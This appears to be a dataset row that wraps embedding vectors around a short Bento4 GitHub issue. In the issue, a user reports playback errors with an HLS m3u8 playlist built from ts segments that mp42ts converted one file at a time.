-0.01888946071267128, 0.00009661064541433007, -0.0022225070279091597, -0.017987145110964775, -0.01360869500786066, -0.008453662507236004, -0.01547249499708414, -0.004992320202291012, -0.014252149499952793, -0.01878591626882553, 0.0021633387077599764, 0.009082324802875519, -0.017217958346009254, -0.009259829297661781, -0.011789271607995033, -0.007980315946042538, 0.006759971380233765, 0.02316436544060707, -0.01557603944092989, -0.007163055241107941, -0.00528446352109313, 0.005402800161391497, -0.009651819244027138, 0.05233430862426758, 0.019688231870532036, 0.008091256953775883, 0.027528023347258568, -0.025915689766407013, -0.00708909472450614, -0.007547648623585701, -0.0037904654163867235, -0.003202480962499976, -0.0018693465972319245, -0.008431474678218365, 0.0034613420721143484, 0.0015383742284029722, 0.0032690453808754683, -0.008527622558176517, -0.012913468293845654, -0.007085396908223629, -0.01680378057062626, 0.006845025811344385, -0.027690736576914787, 0.004833305720239878, 0.01116800494492054, 0.005291859619319439, -0.01795756071805954, 0.00021829844627063721, 0.006109120789915323, 0.019466351717710495, -0.03902145475149155, 0.003313421504572034, 0.0059685963205993176, 0.01927405409514904, -0.011493430472910404, 0.0004890625132247806, -0.004163965117186308, 0.011219777166843414, -0.013897140510380268, -0.003320817369967699, 0.020989933982491493, -0.025116918608546257, -0.013268478214740753, -0.00633839750662446, -0.003760881256312132, 0.01010297704488039, -0.013505150564014912, -0.026211529970169067, 0.018209025263786316, -0.016729820519685745, 0.027779487892985344, 0.02519087865948677, 0.01767651177942753, 0.013549527153372765, 0.000930513022467494, -0.01002162043005228, 0.010243501514196396, 0.0033189684618264437, -0.009614839218556881, 0.01937759853899479, 0.0044043357484042645, -0.028977645561099052, -0.014414862729609013, 0.010672471486032009, -0.009674007073044777, -0.015620415098965168, -0.0071371691301465034, -0.018430907279253006, -0.0032135751098394394, 0.009045344777405262, 0.015265406109392643, 0.007340559735894203, 0.01933322288095951, 0.007273995317518711, -0.014296526089310646, -0.0216851606965065, -0.011922400444746017, 0.008342721499502659, -0.028844516724348068, 0.003505718195810914, -0.015036129392683506, 0.0059648980386555195, -0.00023551733465865254, -0.010672471486032009, -0.023193949833512306, 0.007788019720464945, -0.0023593336809426546, 0.021315358579158783, -0.0034280598629266024, -0.013749219477176666, 0.0013433039421215653, 0.014030269347131252, -0.0072333174757659435, 0.02814929001033306, 0.0010012375423684716, -0.0025109522975981236, -0.010583719238638878, 0.022202882915735245, -0.006068442482501268, 0.012765548191964626, 0.018978213891386986, 0.0068930997513234615, 0.020960349589586258, 0.00020142625726293772, -0.0034317579120397568, -0.014629347249865532, -0.008394493721425533, 0.0026884570252150297, -0.02272060513496399, 0.004097400698810816, -0.02283894084393978, -0.010287878103554249, -0.00433777179569006, 0.0004705724131781608, 0.004304489586502314, -0.006379075814038515, -0.009873700328171253, 0.006194175221025944, 0.0016456167213618755, 0.007085396908223629, -0.0020376062020659447, 0.019362807273864746, 0.02600444108247757, -0.001740840612910688, 0.001336832414381206, 0.0157091673463583, -0.009392958134412766, -0.014163397252559662, 0.006608352996408939, 0.010228709317743778, 0.01998407393693924, 0.02809012122452259, -0.014037664979696274, 0.0020930764731019735, 0.01838652975857258, 0.007007738575339317, 0.011471242643892765, 0.009821928106248379, 0.008838255889713764, -0.013556922785937786, 0.015339366160333157, -0.011160609312355518, 0.024761907756328583, 0.010620699264109135, 0.036654725670814514, 0.00548785412684083, 0.0014976960374042392, -0.014355693943798542, 0.004922057967633009, -0.012846903875470161, -0.001493073534220457, 0.013386813923716545, 0.010672471486032009, -0.007492178585380316, 0.001420962275005877, -0.002289071213454008, 0.0004338233848102391, 0.008860443718731403, 0.014710703864693642, 0.01349775493144989, 0.01998407393693924, -0.012122092768549919, 0.005713433027267456, -0.023312287405133247, 0.012669399380683899, 0.00009320153185399249, -0.03286795690655708, -0.005794789642095566, -0.005214201286435127, 0.018697163090109825, -0.002897394821047783, 0.02103430964052677, -0.0005727300886064768, -0.032010018825531006, -0.017010869458317757, 0.017055245116353035, -0.017262334004044533, 0.017602551728487015, 0.011574787087738514, 0.014969564974308014, 0.00510695856064558, 0.014910396188497543, 0.010221313685178757, -0.00690049584954977, 0.01647835411131382, -0.025989649817347527, 0.010147353634238243, 0.008231781423091888, -0.0021910739596933126, -0.0048407018184661865, -0.018194233998656273, 0.015021337196230888, 0.006930080242455006, 0.02561984769999981, -0.024835869669914246, 0.013394210487604141, 0.008719919249415398, -0.010894352570176125, 0.03274961933493614, 0.007244411390274763, -0.006700803060084581, 0.003934687934815884, -0.014939980581402779, 0.026462994515895844, -0.014030269347131252, -0.0060721407644450665, 0.0029972412157803774 ]
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
mp4: 1.mp4 2.mp4 3.mp4 4.mp4 5.mp4 6.mp4 ts: 1.ts 2.ts 3.ts 4.ts 5.ts m3u8: #EXTM3U #EXT-X-VERSION:3 #EXT-X-TARGETDURATION:10 #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:2.081667, 1.ts #EXTINF:2.081667, 2.ts #EXTINF:2.081667, 3.ts #EXTINF:2.081667, 4.ts #EXTINF:2.081667, 5.ts #EXT-X-ENDLIST
Use mp42ts one by one,m3u8 play error
https://api.github.com/repos/axiomatic-systems/Bento4/issues/886/comments
0
2023-08-07T00:47:18
2023-08-07T00:49:45Z
https://github.com/axiomatic-systems/Bento4/issues/886
1,838,491,396
886
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Use mp42ts one by one,m3u8 play error Issue date: --- start body --- mp4: 1.mp4 2.mp4 3.mp4 4.mp4 5.mp4 6.mp4 ts: 1.ts 2.ts 3.ts 4.ts 5.ts m3u8: #EXTM3U #EXT-X-VERSION:3 #EXT-X-TARGETDURATION:10 #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:2.081667, 1.ts #EXTINF:2.081667, 2.ts #EXTINF:2.081667, 3.ts #EXTINF:2.081667, 4.ts #EXTINF:2.081667, 5.ts #EXT-X-ENDLIST --- end body ---
455
[ 0.007179345935583115, -0.004795290529727936, -0.012999702244997025, 0.012456106953322887, 0.007676347624510527, 0.017581436783075333, -0.03662281855940819, 0.06846199184656143, -0.010972866788506508, 0.03575306385755539, 0.005599035415798426, 0.008643170818686485, 0.023126112297177315, 0.019476257264614105, 0.0016424355562776327, -0.010615646839141846, 0.0018822000129148364, 0.0256266538053751, -0.023995866999030113, 0.023498864844441414, 0.03013073094189167, 0.0006231936276890337, 0.003789638401940465, 0.055850572884082794, -0.00796755962073803, 0.00363432546146214, -0.002962596481665969, 0.0073346588760614395, -0.0472772940993309, -0.003321757772937417, 0.024290960282087326, 0.03656069189310074, -0.004240046255290508, 0.0058902474120259285, 0.0037100405897945166, 0.02092066779732704, 0.06976662576198578, 0.04159283638000488, -0.06119334325194359, 0.03092282824218273, -0.012658013962209225, -0.03901463747024536, -0.02876397781074047, 0.009349845349788666, 0.0017307697562500834, 0.02303292602300644, -0.017270810902118683, 0.0006862895679660141, -0.013791798613965511, -0.026574062183499336, 0.010196302086114883, 0.012572591193020344, -0.012898748740553856, -0.019895602017641068, -0.02901247702538967, -0.053986817598342896, 0.031714923679828644, 0.0040963818319141865, -0.03674706816673279, 0.018249282613396645, -0.01950731873512268, -0.03180811181664467, 0.005769880022853613, 0.014925584197044373, 0.0014201437588781118, 0.008596577681601048, -0.03233617544174194, 0.005315589252859354, -0.02185254544019699, 0.028748445212841034, -0.002782044932246208, -0.006930844858288765, 0.028111662715673447, 0.04805385693907738, 0.010095348581671715, -0.04858192056417465, 0.04563097283244133, 0.044605907052755356, 0.010009925812482834, 0.02901247702538967, -0.05255793780088425, -0.014086893759667873, -0.06352303922176361, 0.00666681258007884, 0.02174382656812668, 0.0234522707760334, -0.08821780979633331, -0.05727945268154144, -0.02655853144824505, -0.006581390276551247, 0.004981665872037411, 0.020470259711146355, 0.039729077368974686, 0.00020469774608500302, -0.00228310190141201, 0.025083057582378387, -0.0020578978583216667, 0.0029548308812081814, -0.04382934421300888, -0.07144400477409363, 0.005164158996194601, 0.005117564927786589, -0.004655508790165186, -0.018420128151774406, 0.03699556738138199, -0.017814407125115395, 0.03025498241186142, -0.007730707060545683, -0.0005052527412772179, 0.04476122185587883, 0.023001862689852715, 0.01574874296784401, -0.005121447611600161, -0.02809613011777401, -0.014871224761009216, -0.014149018563330173, -0.022566985338926315, -0.06871049106121063, -0.005680575035512447, -0.0009347904124297202, 0.02050132304430008, -0.0256887786090374, -0.05544675886631012, 0.014428582042455673, -0.03926314041018486, 0.06461022794246674, -0.025455808266997337, 0.015018772333860397, 0.014948881231248379, -0.026325561106204987, -0.023312488570809364, -0.011104882694780827, -0.016090432181954384, -0.03233617544174194, 0.0008090839255601168, 0.018140563741326332, -0.04252471402287483, -0.002799517707899213, 0.00944303348660469, -0.045040786266326904, -0.03839338570833206, -0.011842619627714157, 0.040660955011844635, 0.000015834650184842758, -0.02031494677066803, -0.030286043882369995, 0.01709996722638607, 0.018979255110025406, -0.013442344032227993, 0.048612985759973526, -0.0029567722231149673, -0.03500756248831749, -0.01080202218145132, -0.011477634310722351, -0.009124641306698322, 0.013170546852052212, 0.013263734057545662, 0.014638255350291729, -0.004806939046829939, 0.007521034684032202, 0.000882372260093689, 0.012937577441334724, -0.006717289332300425, -0.021526388823986053, -0.0009435268002562225, -0.014801333658397198, 0.013488938100636005, 0.03087623417377472, -0.005420425441116095, 0.02865525707602501, -0.040412455797195435, 0.007625870872288942, 0.005055439658463001, 0.03155961260199547, -0.03901463747024536, -0.02957160398364067, 0.02747487835586071, 0.015088662505149841, -0.014964411966502666, 0.016898060217499733, -0.03463480994105339, 0.004651625640690327, 0.012937577441334724, 0.006596921943128109, 0.01919669285416603, -0.03780319541692734, 0.019895602017641068, -0.0251917764544487, 0.008480092510581017, -0.010833085514605045, 0.023498864844441414, 0.05970233678817749, 0.03376505523920059, -0.014164550229907036, 0.022753361612558365, -0.01435869187116623, -0.021759359166026115, -0.059919774532318115, -0.00016781089652795345, 0.04143752157688141, 0.008068513125181198, -0.014397519640624523, -0.016276808455586433, -0.0038653535302728415, -0.005206869915127754, 0.007027915678918362, -0.0032751639373600483, 0.019414130598306656, 0.003531430382281542, -0.014071362093091011, -0.03401355817914009, -0.031155798584222794, 0.06299497187137604, 0.03292636573314667, 0.03920101374387741, -0.005482550710439682, -0.014972178265452385, 0.03187023848295212, -0.02365417778491974, 0.009745893999934196, 0.030596671625971794, -0.0008712091366760433, 0.007862723432481289, -0.005684457719326019, -0.01629233919084072, -0.004348765593022108, -0.013318094424903393, -0.006899782456457615, 0.013947111554443836, -0.025083057582378387, 0.023374613374471664, 0.03056560829281807, -0.03926314041018486, -0.010227364487946033, -0.006577507592737675, 0.016137026250362396, 0.019678164273500443, -0.027381690219044685, 0.012642482295632362, -0.011687306687235832, -0.010266192257404327, 0.001640494097955525, -0.004174038302153349, 0.01006428524851799, -0.015275038778781891, 0.04575522616505623, 0.006748352199792862, -0.006973555777221918, -0.018311409279704094, -0.015352695249021053, 0.011780494824051857, -0.01379956491291523, 0.027878692373633385, -0.003399414476007223, -0.006418311968445778, 0.030301576480269432, 0.028934821486473083, -0.011664009653031826, -0.012122183106839657, -0.06044783815741539, -0.0013405457139015198, 0.02266017347574234, -0.023296957835555077, -0.03295743092894554, 0.051719244569540024, -0.0498865507543087, -0.01299193687736988, 0.002318047219887376, -0.01629233919084072, 0.0058941300958395, 0.016152556985616684, -0.009559518657624722, -0.024710306897759438, 0.012774498201906681, -0.013209374621510506, -0.03261573985219002, 0.001804543542675674, -0.005047674290835857, 0.011563056148588657, -0.0239492729306221, -0.018389064818620682, 0.05839770659804344, 0.00264808745123446, 0.00978472176939249, -0.0046089147217571735, -0.028002943843603134, 0.029059071093797684, -0.007497737649828196, -0.056347575038671494, -0.019973257556557655, 0.026372155174613, -0.0009512924589216709, -0.010949569754302502, -0.015337163582444191, -0.007039564196020365, 0.035287123173475266, 0.0064532570540905, 0.02129341848194599, 0.023747365921735764, 0.005335003137588501, -0.03951163962483406, 0.01225419994443655, 0.03395143151283264, -0.027987411245703697, -0.09020581841468811, -0.01448294147849083, -0.0055757383815944195, -0.028065068647265434, -0.0023762895725667477, -0.018125033006072044, 0.05926746129989624, -0.0076841129921376705, -0.016944654285907745, 0.002022952539846301, -0.021930202841758728, -0.018140563741326332, 0.007451143581420183, 0.0030907297041267157, -0.02377842739224434, 0.0071871113032102585, -0.026822563260793686, 0.022815486416220665, -0.05889470875263214, 0.02110704407095909, -0.0011881447862833738, -0.016571901738643646, -0.018109502270817757, 0.003294578054919839, -0.030519014224410057, 0.015640024095773697, 0.02840675599873066, -0.03761681914329529, 0.024244366213679314, 0.02772337943315506, 0.03137323632836342, -0.03749256953597069, -0.025362621992826462, -0.019911132752895355, 0.007326893042773008, -0.01438975427299738, -0.034044619649648666, 0.008697531186044216, 0.03419993445277214, -0.014529535546898842, -0.008293717168271542, 0.020982792600989342, -0.023203769698739052, 0.01728634163737297, 0.05007292702794075, 0.024865619838237762, 0.0009396439418196678, -0.006200873758643866, -0.00030819931998848915, -0.005222401116043329, 0.006325123831629753, -0.022396141663193703, -0.008324779570102692, -0.009978863410651684, 0.054608069360256195, -0.0013871396658942103, 0.0006324153509922326, -0.009210064075887203, 0.01000216044485569, 0.01630786992609501, 0.015508008189499378, -0.005505847744643688, -0.022085515782237053, -0.017379529774188995, -0.025020932778716087, -0.013209374621510506, -0.041157957166433334, 0.0029936591163277626, -0.006014497950673103, 0.03711982071399689, -0.05588163435459137, 0.0007416197913698852, -0.006247467361390591, 0.005234049633145332, -0.02376289665699005, -0.006826008670032024, -0.03401355817914009, 0.01832694001495838, 0.03680919110774994, -0.05227837339043617, 0.0006935698329471052, 0.010405974462628365, 0.018792878836393356, 0.0027781622484326363, -0.014032534323632717, -0.04069202020764351, 0.005136979278177023, 0.00814616959542036, -0.0268691573292017, -0.022458266466856003, -0.008006387390196323, 0.03196342661976814, -0.04348765313625336, -0.02537815272808075, -0.014948881231248379, -0.04205877333879471, 0.027769973501563072, -0.01975581981241703, 0.048426609486341476, 0.00029266803176142275, -0.02433755435049534, 0.035659875720739365, -0.021712765097618103, 0.0029140610713511705, 0.039666954427957535, 0.024865619838237762, 0.0008663556072860956, -0.04761898145079613, -0.011322321370244026, -0.020144103094935417, 0.02334355190396309, 0.06290178745985031, -0.02377842739224434, 0.029835637658834457, -0.03562881425023079, 0.0028402875177562237, -0.0031586792320013046, 0.014661552384495735, 0.018202688544988632, -0.028189318254590034, 0.035038623958826065, 0.02550240233540535, -0.008666467852890491, -0.011834854260087013, -0.024679243564605713, -0.02859313227236271, 0.03277105465531349, -0.036156877875328064, 0.0031722690910100937, -0.007260885089635849, 0.03345442935824394, 0.004713750910013914, -0.023048456758260727, -0.00589801324531436, -0.013100655749440193, -0.02901247702538967, -0.006631867028772831, 0.04737047851085663, 0.009776956401765347, 0.008068513125181198, 0.03494543582201004, -0.03320593014359474, -0.05970233678817749, -0.029167789965867996, 0.005175807513296604, -0.007990856654942036, 0.03764788433909416, 0.022302953526377678, 0.024213304743170738, -0.018932661041617393, -0.020392604172229767, 0.008223826065659523, 0.005785411223769188, 0.0011279609752818942, -0.004034256562590599, 0.0019608272705227137, -0.022256359457969666, 0.03141982853412628, 0.025781966745853424, -0.004449719097465277, -0.013620954938232899, -0.02870185114443302, -0.024896681308746338, -0.015057600103318691, 0.005878598894923925, -0.029602667316794395, 0.0060727400705218315, -0.013628720305860043, 0.013574360869824886, -0.019165629521012306, 0.00021064332395326346, -0.0019404423655942082, -0.02259804867208004, -0.052029870450496674, -0.017270810902118683, -0.05190562084317207, -0.027086595073342323, -0.03569093719124794, 0.015150788240134716, 0.011586353182792664, -0.02019069716334343, -0.011104882694780827, -0.007730707060545683, -0.02160404436290264, -0.010949569754302502, 0.010444802232086658, 0.012401747517287731, 0.0010095348116010427, -0.015259507112205029, 0.025611121207475662, 0.01623021438717842, -0.004465250298380852, -0.013108421117067337, -0.021774889901280403, -0.004973900504410267, -0.01123689953237772, 0.005144744645804167, -0.024787962436676025, 0.02112257480621338, 0.0013978173956274986, 0.009683768264949322, -0.03833125904202461, -0.024772431701421738, 0.019849007949233055, -0.026962345466017723, -0.01577204093337059, -0.010670006275177002, -0.027552535757422447, 0.02488115057349205, -0.0007484147790819407, 0.0023626997135579586, -0.015383757650852203, 0.012098887003958225, 0.010126410983502865, 0.02716425247490406, 0.0032615740783512592, -0.013605423271656036, -0.001985094975680113, -0.021091511473059654, 0.022334016859531403, -0.029835637658834457, 0.005373831372708082, -0.006410546135157347, -0.008324779570102692, 0.023576520383358, -0.02278442494571209, -0.020221758633852005, -0.004337117075920105, 0.03320593014359474, 0.040163956582546234, -0.02915225923061371, -0.0015084779588505626, -0.03469693660736084, 0.040412455797195435, 0.004585617687553167, 0.008045216090977192, -0.005323354620486498, 0.041344333440065384, -0.03000648133456707, 0.011788260191679, -0.06392685323953629, 0.034976497292518616, -0.0037818728014826775, 0.0013473407598212361, 0.008821780793368816, 0.00938090868294239, 0.029556073248386383, 0.011112648993730545, -0.01157858781516552, -0.0010027398820966482, -0.015150788240134716, 0.01709996722638607, -0.0054087769240140915, 0.015259507112205029, 0.03789638355374336, 0.020532384514808655, -0.00839467067271471, 0.024617118760943413, 0.04805385693907738, -0.008037450723350048, 0.012968639843165874, 0.02784762904047966, 0.0013968467246741056, 0.008604343049228191, -0.015135256573557854, 0.03233617544174194, -0.0009469242650084198, -0.001363842748105526, 0.020827479660511017, 0.003921654541045427, 0.01006428524851799, 0.024399681016802788, 0.0021413785871118307, 0.0011512580094859004, 0.0008911086479201913, -0.028453350067138672, 0.07063637673854828, -0.011415509507060051, 0.008518921211361885, 0.007497737649828196, -0.021899139508605003, -0.02610812336206436, 0.0013483114307746291, -0.022054452449083328, -0.013675314374268055, -0.005051556974649429, -0.009210064075887203, -0.010895210318267345, -0.008604343049228191, -0.01994219608604908, 0.001723004155792296, -0.01647871546447277, -0.003013073233887553, -0.004892360884696245, 0.03988439217209816, 0.01641658879816532, -0.00270050554536283, 0.04820917174220085, -0.014242206700146198, -0.049979738891124725, -0.010351615026593208, 0.03826913610100746, 0.012906514108181, 0.012743435800075531, -0.04140646010637283, 0.049047861248254776, 0.020734291523694992, 0.015515773557126522, 0.07697314769029617, 0.0013541356893256307, -0.005878598894923925, 0.005688340403139591, 0.006849305704236031, -0.00016902427887544036, -0.003956600092351437, 0.02610812336206436, 0.023607583716511726, -0.035970501601696014, 0.0532413125038147, -0.030223919078707695, -0.0005076795350760221, 0.03373399376869202, 0.00045720278285443783, -0.0023102816194295883, 0.007983090355992317, -0.03117132931947708, -0.03463480994105339, 0.004181803669780493, 0.0018161919433623552, -0.046407539397478104, -0.003515899181365967, -0.0006654193275608122, 0.028065068647265434, -0.045972663909196854, 0.007458909414708614, -0.0070512122474610806, -0.003717806190252304, -0.017767813056707382, -0.01442081667482853, 0.01589629054069519, -0.017193155363202095, 0.030270513147115707, -0.017643561586737633, 0.02216317318379879, 0.005812590941786766, 0.00512533076107502, -0.03426205739378929, -0.011555290780961514, 0.008643170818686485, 0.014381988905370235, 0.013046296313405037, -0.02859313227236271, -0.014063596725463867, 0.019647100940346718, 0.005940724164247513, -0.012425043620169163, -0.03889038786292076, -0.009745893999934196, 0.03264680132269859, -0.01157858781516552, 0.015290569514036179, 0.026341093704104424, 0.0013415165012702346, -0.015523538924753666, -0.030099669471383095, 0.02050132304430008, 0.0037838141433894634, -0.045848410576581955, 0.0032538084778934717, 0.023001862689852715, -0.008914968930184841, 0.009870144538581371, -0.022147640585899353, -0.0010454509174451232, 0.008744124323129654, -0.03261573985219002, 0.010794256813824177, -0.017767813056707382, -0.005335003137588501, 0.003469305345788598, -0.0067017581313848495, 0.000026482088287593797, -0.014886755496263504, -0.004954486154019833, 0.005032142624258995, 0.0031955658923834562, 0.02902800962328911, 0.029866699129343033, 0.021277887746691704, 0.04094051942229271, -0.010646709240972996, -0.0024403564166277647, 0.01950731873512268, 0.006212521810084581, 0.00034363011945970356, -0.03283317759633064, -0.04308383911848068, -0.007750121410936117, -0.005750465672463179, -0.015531305223703384, 0.011337853036820889, 0.015593430027365685, -0.0058747162111103535, -0.018932661041617393, 0.006127099972218275, 0.008837312459945679, 0.010452568531036377, 0.02099832519888878, -0.008946031332015991, 0.009714831598103046, -0.01021959912031889, -0.005486433394253254, 0.002318047219887376, -0.01581086777150631, -0.05255793780088425, 0.015197382308542728, 0.002104491926729679, -0.01908797398209572, -0.016276808455586433, -0.006127099972218275, -0.02168170176446438, -0.0004889934207312763, -0.003568317275494337, 0.026511937379837036, 0.004993314389139414, 0.009303251281380653, -0.006084388587623835, -0.022365078330039978, 0.02154191955924034, 0.02234954759478569, -0.05184349790215492, 0.022256359457969666, 0.005948489997535944, -0.011159243062138557, -0.006958024576306343, 0.013535532169044018, 0.03081410937011242, 0.023296957835555077, -0.014009237289428711, -0.01090297568589449, 0.003556668758392334, -0.00736572127789259, -0.014490707777440548, 0.02697787620127201, -0.003541137557476759, -0.013807330280542374, 0.01567108742892742, -0.020221758633852005, 0.012665779329836369, -0.0498865507543087, -0.013426813296973705, 0.016385527327656746, 0.04575522616505623, 0.012867686338722706, -0.002549075521528721, -0.0003297975636087358, 0.00022556794283445925, 0.0005130183999426663, -0.004232280422002077, 0.013822861015796661, 0.005028259940445423, -0.018016314134001732, 0.018311409279704094, -0.016525307670235634, 0.01540705468505621, -0.022147640585899353, -0.009823550470173359, -0.005940724164247513, -0.03162173554301262, -0.008084043860435486, 0.015049834735691547, 0.0025820794980973005, -0.03680919110774994, -0.008837312459945679, -0.006923079025000334, 0.0034790122881531715, -0.02963373064994812, -0.024430742487311363, -0.03531818836927414, 0.02050132304430008, 0.012028995901346207, -0.021961266174912453, 0.012153246439993382, 0.022256359457969666, 0.007455026265233755, -0.0020753706339746714, -0.004678805824369192, -0.03068985790014267, 0.01796972006559372, -0.011244664900004864, 0.009489627555012703, -0.014156784862279892, -0.0006799799739383161, 0.011803791858255863, -0.008037450723350048, 0.010506927967071533, 0.01882394216954708, 0.001130873104557395, -0.0019268525065854192, -0.008775187656283379, -0.017954189330339432, 0.017488248646259308, -0.019740289077162743, -0.015166318975389004, -0.024803495034575462, 0.013457875698804855, -0.013752970844507217, -0.02419777400791645, 0.014498473145067692, -0.016509776934981346, 0.024151179939508438, 0.016338933259248734, 0.00901592243462801, -0.005661160685122013, -0.01950731873512268, 0.0261236559599638, -0.004620563238859177, 0.03329911828041077, 0.003908064682036638, -0.010522458702325821, 0.002564606722444296, -0.04758791998028755, -0.010600116103887558, 0.02643428184092045, 0.02253592386841774, 0.025238370522856712, -0.007513268850743771, -0.00821606069803238, -0.03500756248831749, 0.012867686338722706, -0.030146263539791107, 0.027692316100001335, -0.030146263539791107, 0.020516853779554367, -0.017876531928777695, 0.018202688544988632, -0.019274350255727768, 0.017861001193523407, -0.04345659166574478, -0.021138105541467667, -0.012510466389358044, -0.01157858781516552, -0.00036280156928114593, -0.007738472893834114, 0.01343457866460085, 0.01253376342356205, 0.008829547092318535, 0.01877734810113907, 0.01509642880409956, 0.01672721467912197, -0.007346307393163443, -0.002178265480324626, 0.005505847744643688, -0.002026835223659873, 0.030953891575336456, -0.03457268327474594, 0.03907676413655281, -0.0010454509174451232, -0.03329911828041077, -0.015484711155295372, -0.007870488800108433, -0.012463872320950031, -0.006099920254200697, -0.04401571676135063, -0.03146642446517944, -0.0028849400114268064, 0.012471637688577175, -0.01330256275832653, -0.0014939174288883805, -0.007645284757018089, -0.0261857807636261, -0.00118426198605448, -0.011221367865800858, 0.020283883437514305, 0.001517214346677065, -0.004721516743302345, 0.01386168971657753, -0.030720921233296394, 0.00361296976916492, 0.0014541184064000845, 0.028686320409178734, -0.0028732914943248034, 0.017395062372088432, -0.01431986317038536, -0.03693344444036484, -0.0073385415598750114, 0.024228835478425026, 0.011656244285404682, -0.023001862689852715, -0.012642482295632362, -0.006492085289210081, 0.011089351959526539, -0.02272230014204979, -0.02679150179028511, -0.007241470739245415, -0.02895035222172737, -0.0035508444998413324, -0.004628329072147608, 0.008379139006137848, 0.017317404970526695, -0.011073820292949677, -0.03075198456645012, 0.0061892252415418625, 0.010242895223200321, -0.0008090839255601168, 0.009303251281380653, 0.015352695249021053, 0.0017812465084716678, -0.01225419994443655, -0.027024470269680023, -0.015484711155295372, -0.025611121207475662, -0.009683768264949322, -0.025548996403813362, -0.019429663196206093, 0.04174814745783806, -0.04308383911848068, -0.025207307189702988, 0.010367145761847496, 0.04432634636759758, 0.014436348341405392, -0.02019069716334343, -0.01692912168800831, -0.015344928950071335, 0.012541528791189194, -0.004962251987308264, -0.008045216090977192, 0.004379827994853258, -0.008511154912412167, -0.00019474800501484424, -0.011135946027934551, -0.01685146614909172, -0.0009580873884260654, -0.008301482535898685, -0.0012298852670937777, -0.04395359382033348, 0.030146263539791107, 0.011493165977299213, -0.0005897042574360967, -0.005529144778847694, 0.003131499281153083, 0.025253901258111, -0.005331120453774929, 0.03767894580960274, -0.006449374370276928, -0.008084043860435486, 0.018994785845279694, -0.006965790409594774, -0.03652963042259216, -0.05653395131230354, -0.035597752779722214, 0.013178312219679356, -0.013473407365381718, 0.01098839845508337, -0.0120056988671422, 0.02222529798746109, -0.0003402326547075063, 0.01564778946340084, 0.00032931219902820885, -0.01098839845508337, -0.00997109804302454, 0.01624574512243271, -0.003444066969677806, 0.04143752157688141, -0.019988790154457092, -0.005719403270632029, 0.01386168971657753, -0.04212090000510216, 0.009303251281380653, -0.008379139006137848, -0.0076685817912220955, 0.03612581640481949, 0.012308559380471706, -0.008891671895980835, -0.006247467361390591, -0.0065347966738045216, -0.03451056033372879, -0.015383757650852203, 0.028204848989844322, -0.024415211752057076, 0.00603391183540225, 0.013411281630396843, 0.001888994942419231, -0.0009910913649946451, 0.00023102815612219274, -0.022986331954598427, 0.03671600669622421, 0.017146561294794083, 0.005342768970876932, -0.025176245719194412, 0.01946072466671467, 0.009831315837800503, -0.005552441347390413, -0.0028169904835522175, -0.017503781244158745, -0.00543595664203167, -0.017239749431610107, 0.014009237289428711, -0.02865525707602501, 0.03100048564374447, 0.0250675268471241, 0.012425043620169163, 0.01481686532497406, 0.010273958556354046, -0.027335096150636673, -0.00037736218655481935, 0.002729626838117838, -0.007117220666259527, 0.006647398695349693, -0.0019113211892545223, -0.0015143022174015641, 0.030720921233296394, 0.015562367625534534, -0.0006314446218311787, 0.02284654974937439, 0.03000648133456707, 0.008324779570102692, 0.0017433889443054795, 0.016820402815937996, 0.011438806541264057, 0.00901592243462801, 0.016447652131319046, -0.024803495034575462, 0.009994395077228546, 0.017923125997185707, 0.013884986750781536, 0.009147938340902328, 0.011656244285404682, 0.01512749120593071, 0.019476257264614105, -0.020081978291273117, -0.009031454101204872, 0.009466330520808697, -0.03131110966205597, -0.009078048169612885, 0.0002885425346903503, 0.03463480994105339, -0.013193843886256218, -0.02179042063653469, -0.006266881711781025, -0.006616335827857256, 0.0013735498068854213, 0.015508008189499378, 0.026838095858693123, -0.018559910356998444, 0.009272188879549503, 0.025051994249224663, -0.0015890466747805476, 0.04451271891593933, -0.006616335827857256, 0.016804872080683708, -0.0003035884874407202, -0.015042069368064404, -0.023576520383358, 0.012122183106839657, 0.0026364389341324568, -0.018435658887028694, -0.021821483969688416, 0.018482252955436707, -0.01803184486925602, -0.01386168971657753, -0.01969369500875473, -0.0016269042389467359, 0.009093578904867172, 0.004888478200882673, 0.02376289665699005, 0.014824630692601204, -0.005548558663576841, -0.007152165751904249, -0.008720828220248222, 0.018233751878142357, 0.010972866788506508, 0.01908797398209572, -0.00975365936756134, 0.023685239255428314, -0.0021239060442894697, -0.024042461067438126, -0.01610596291720867, 0.012339621782302856, -0.011935807764530182, -0.01034384872764349, 0.005335003137588501, 0.00065377086866647, -0.01459942664951086, -0.01913456805050373, -0.01610596291720867, -0.014778036624193192, -0.01612149551510811, -0.007272533606737852, -0.016820402815937996, -0.04808492213487625, 0.005832004826515913, 0.0042788744904100895, 0.08293716609477997, 0.007656933274120092, -0.017426123842597008, -0.011772729456424713, -0.015080897137522697, 0.00018710369477048516, -0.01641658879816532, 0.007303596008569002, 0.0012065882328897715, 0.004010959528386593, -0.007295830640941858, 0.0004933616146445274, -0.020843012258410454, -0.005703871604055166, 0.00926442351192236, 0.0017734809080138803, 0.010522458702325821, 0.0005819385987706482, 0.01570991426706314, -0.005614566616714001, 0.013745204545557499, 0.012634716928005219, 0.04159283638000488, -0.0030868467874825, 0.00015810383774805814, -0.022893143817782402, -0.006096037104725838, 0.012355153448879719, -0.019771350547671318, -0.008449030108749866, -0.007109454832971096, 0.004651625640690327, 0.008262653835117817, -0.0063872491009533405, -0.002896588295698166, 0.026154717430472374, 0.02846888266503811, 0.026682782918214798, -0.0039041817653924227, -0.02944735437631607, 0.025890685617923737, -0.012510466389358044, 0.01685146614909172, -0.018482252955436707, -0.012013464234769344, -0.03882826119661331, 0.025968341156840324, -0.0017016485799103975, 0.003319816431030631, -0.012712373398244381, 0.006461022887378931, -0.017736749723553658, 0.010716600343585014, 0.02307952009141445, -0.01915009878575802, -0.0024403564166277647, 0.014211144298315048, -0.015065365470945835, 0.01098839845508337, -0.022629112005233765, 0.01080202218145132, 0.018559910356998444, 0.006624101661145687, 0.02427542954683304, -0.00463221175596118, 0.01566332019865513, -0.03755469620227814, 0.009109110571444035, -0.012665779329836369, 0.004919541068375111, -0.003987662494182587, -0.010188535787165165, 0.00954398699104786, -0.012246433645486832, 0.014459645375609398, 0.0017870707670226693, -0.026574062183499336, 0.018171627074480057, -0.03711982071399689, -0.006643515545874834, 0.01877734810113907, 0.03963588923215866, -0.012184308841824532, -0.003069374244660139, -0.018994785845279694, 0.015135256573557854, 0.006740586366504431, 0.012487169355154037, 